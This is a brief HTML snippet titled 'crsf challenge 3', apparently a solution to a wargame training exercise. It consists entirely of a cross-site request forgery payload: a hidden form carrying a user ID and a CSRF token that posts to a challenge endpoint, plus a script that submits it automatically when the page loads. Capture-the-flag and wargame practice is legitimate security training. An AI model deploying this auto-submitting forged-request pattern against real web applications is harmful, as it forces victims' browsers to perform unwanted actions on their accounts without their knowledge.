crsf challenge 3

by dschu012

HTML

<form name="csrfForm" action="https://wargames.rtp.raleigh.ibm.com/user/csrfchallengethree/plusplus" method="POST">
<input type="hidden" name="userid" value="26456335762686255910491359944695649305" />
<input type="hidden" name="csrfToken" value="9b6292bc172c468fb0d9241232b1df3f7c05085a" />
<input type="submit"/>
</form>
<script>
document.csrfForm.submit();
</script>